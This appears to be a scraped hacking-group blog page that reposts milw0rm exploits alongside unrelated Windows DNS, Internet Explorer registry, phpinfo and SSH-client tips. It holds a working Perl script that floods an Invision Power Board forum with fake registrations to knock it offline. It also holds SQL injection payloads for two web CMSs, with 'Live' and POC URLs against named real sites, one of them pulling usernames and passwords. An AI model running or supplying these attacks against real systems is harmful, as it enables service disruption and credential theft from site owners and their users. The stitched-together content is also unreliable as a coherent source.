Invision Power Board <= 2.1.4 (Register Users) Denial of Service Exploit

#!/usr/bin/perl
use IO::Socket;
##########################################################
## _______ _______ ______ #
## |______ |______ | \ #
## ______| |______ |_____/ #
## #
##IPB Register Multiple Users Denial of Service #
##Doesn't Work on forums using "Code Confirmation" #
##Created By SkOd #
##SED security Team #
##http://www.sed-team.be #
##skod.uk@gmail.com #
##ISRAEL #
##########################################################

print q{
############################################################
# Invision Power Board Multiple Users DOS #
# Tested on IPB 2.0.1 #
# created By SkOd. SED Security Team #
############################################################
};
$rand=rand(10);
print "Forum Host: ";
$serv = ;
chop ($serv);
print "Forum Path: ";
$path = ;
chop ($path);
for ($i=0; $i<9999 data-blogger-escaped-br="" data-blogger-escaped-i="">{
$name="sedXPL_".$rand.$i;
$data = "act=Reg&CODE=02&coppa_user=0&UserName=".$name."&PassWord=sedbotbeta&PassWord_Check=sedbotbeta&EmailAddress=".$name."\@host.com&EmailAddress_two=".$name."\@host.com&allow_admin_mail=1&allow_member_mail=1&day=11&month=11&year=1985&agree=1";
$len = length $data;
$get1 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "Cennot Connect Host, it's can be beacuse the host dosed";
print $get1 "POST ".$path."index.php HTTP/1.0\n";
print $get1 "Host: ".$serv."\n";
print $get1 "Content-Type: application/x-www-form-urlencoded\n";
print $get1 "Content-Length: ".$len."\n\n";
print $get1 $data;
syswrite STDOUT, "+";
}
print "Forum shuld be Dosed. Check it out...\n";

# milw0rm.com [2006-02-10]

Fear Nothing. Risk Everything.

WWW.INDONESIANCODER.COM

CMS WEBjump! Multiple SQL Injection Vulnerabilities

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Powered by Content Management System WEBjump! SQL Injection Vulnerability
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Author : M3NW5
contach : M3NW5@hackermail.com
GreetZ : Anggie Barker,vhiia ^,^
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

--== Dork ==--
Powered by Content Management System WEBjump! "portfolio_genre.php?id="

Exploite : www.sute.com/portfolio_genre.php?id=-67%20union%20select%201,2,@@version--

Live : http://www.leti.cz/portfolio_genre.php?id=-67%20union%20select%201,2,@@version--

--== Dork ==--
Powered by Content Management System WEBjump! "news_id.php?lang="

Exploite : www.sute.com/path/news_id.php?lang=en&id=-92%20union%20select%201,2,3,@@version,5--

Live : http://tower.klif.pl/content/news_id.php?lang=en&id=-92%20union%20select%201,2,3,@@version,5--

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

# milw0rm.com [2009-03-10]



VIVA INDONESIAN CODER TEAM
Fear Nothing. Risk Everything.

Prevent DNS problems with this tip for Windows XP

When you visit a website, Windows XP tries to speed things up by placing the DNS information about that site, into a DNS cache on your PC.

This is OK until there are problems with the network, DNS server or even the website!

You see the DNS Windows XP cache stores BOTH negative and positive entries. The positive entries are those that the DNS lookup was successful and you could connect to the website.

Negative entries are those where the DNS lookup failed and you could not connect to the website.

A problem can arise here because if the DNS cache hold a negative entry and the website you want to view is now OK to view, Windows XP will still give you a DNS error!

By default these negative entries are cached for 5 mins. But we can tweak the registry to NOT store negative entries at all!

There is ALSO another potential pitfall with the Windows XP DNS cache...

Most ISP's and Domain name registrar's now update their DNS information (TTL) every 4 hours instead of the twice daily updates that were common few years ago.

This means that your DNS Windows XP cache may be out of date for certain entries!

So lets look at how we can tweak the registry to prevent these problems occurring:

Flush DNS

First of all it would be a good idea to flush the local DNS cache so we are starting with a clean sheet!

To do this simply enter: ipconfig /flushdns in a command prompt. You will then get the following window appear confirming the flush,



Successful DNS Flush

Now we have a clean DNS cache lets make the changes to the registry.


Block Negative Entries

To force Windows XP NOT to cache negative entries we need to add a new DWORD to the following Registry key:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters

DWORD: MaxNegativeCacheTtl

Value: 0

This will now ensure NO negative entries are stored.


Cache TTL

To force Windows XP to keep positive entries in DNS Cache for only 4 hours instead of the default 24 hours we need to apply the following change to the registry:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters

DWORD: MaxCacheTtl

Value: 14400

NB - make sure you enter the 14400 (seconds) as Decimal Base and NOT Hexadecimal Base!

Now your registry key should look similar to this







VIVA INDONESIAN CODER TEAM
Fear Nothing. Risk Everything.

"This operation has been cancelled due to restrictions in effect on this computer."

A very common question in the Microsoft public newsgroups goes something like this:

When clicking on a hyperlink in an e-mail, I get this Message : "This operation has been cancelled due to restrictions in effect on this computer. Please contact your system administrator." I get this message every time that I attempt to use the hyperlink. I am the administrator on this stand alone computer. How do I deactivate this feature so that I activate hyperlinks ?

This is not an Outlook error. The most common cause is a corrupt registry key in Internet Explorer 6. The registry key found at

HKEY_Local_Machine\Software\Classes\htmlfile\shell\open\command

is either damaged or corrupt.

To fix it, try resetting Web settings in Internet Explorer. If this does not resolve the issue, you'll need to import the registry key from another computer.

Reset Web Settings

To Reset Web settings

1. Open Internet Explorer.
2. On the Tools menu, click Internet Options.
3. Click the Programs tab, and then click the Reset Web Settings button.
4. Under Internet programs, verify that the correct e-mail program is selected.
5. Click to select the Internet Explorer should check to see whether it is the default browser check box.
6. Click Apply, and then click OK.

If you receive a message when Internet Explorer starts telling you that IE is not currently your default browser, click Yes to make it your default.

Import the Registry Key

When resetting the web settings doesn't help, you'll need to recreate the corrupt key. The easiest way to do this is by exporting the key from another computer.

To save exporting it from another computer, right click here to download a registry key exported from my computer. Choose Save target as and change the file extension from txt to reg and double click on it to run it.

If you prefer to use a key from a computer you have access to, follow the instructions in You receive an error message when you click a hyperlink in Outlook.

Set Program Access in Control Panel

Windows XP and Vista allow you to control program defaults through Control Panel, Add and Remove Programs, Set Program Access and Defaults. If the above methods fail, use this method to set the default browser.

Other Causes

There are several other causes of this error. In most cases, they do not affect hyperlinks in Outlook. If you found this page searching for the error message, check out the following pages. Note that if you receive this error on a computer at work, you should contact your administrator, they may want access to applications restricted for security reasons.

You receive the message when:
# Using Outlook 2002 SP3
# Trying to run a program
# Saving a document (Windows 2000)
# Accessing file open dialog
# Starting Windows Explorer

Search Microsoft (using Google) for additional articles

More Information

You receive an error message when you click a hyperlink in Outlook


VIVA INDONESIAN CODER TEAM
Fear Nothing. Risk Everything.

Jogjacamp JProfile Gold (id_news) Remote SQL Injection Vulnerability

Jogjacamp JProfile Gold SQL Injection

by kecemplungkalen

Vendor : http://jogjacamp.com

bugs : /index.php?action=news.detail&id_news=

exploit : union select concat(username,0x3a,password),2,3 from phpss_account--

POC : http://www.titiandamai.org/index.php?action=news.detail&id_news=6%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--

http://www.ligaindonesia.com/index.php?action=news.detail&id_news=1976%20%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--

http://hermawan.net/index.php?action=news.detail&id_news=42%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--

###############################################################

greetz : Allah
s3t4n and Paman aka Jack-
my family
and all Mainhack BrotherHood
jupe crew jangan ngegame melulu :p

# milw0rm.com [2009-03-03]


VIVA INDONESIAN CODER TEAM
Fear Nothing. Risk Everything.

Make a PHP info file

This tutorial will show you how to display Apache PHP configuration.
It is useful in cases when you are going to install a particular application which needs specific requirements like register_globals or long_array turned On or Off.

This can be done by simply uploading one file, for example 'info.php' with the following code included inside:

// Print all information.
phpinfo();

// Output only the module information.
phpinfo(INFO_MODULES);

?>

create one text file with your favorite text editor like Notepad, then copy and paste the code above into it. Save the file for example like info.php and then upload it to your server.
Then you are ready type : http://yourdomain.tld/info.php and you should see a table with the current PHP configuration and module information.




VIVA INDONESIAN CODER TEAM
Fear Nothing. Risk Everything.

SSH Explorer SSH Client

SSH Explorer is a new generation SSH/Telnet client and terminal emulator that makes remote Linux server administration look like much more fun than it actually is.
File View panel lets you navigate through and operate with remote directories and files as effortlessly as if they were on your home computer.

The integrated text editor will be a great tool for people who don't like the awkward vi and emacs interface.

SSH Explorer also includes a pack of useful Linux commands and allows you to create your own snippets so you don't have to remember and type them anymore. VT100 terminal emulation, SSH1, SSH2 and Telnet protocols are supported.

PCWIN[dot]COM

VIVA INDONESIAN CODER TEAM
Fear Nothing. Risk Everything.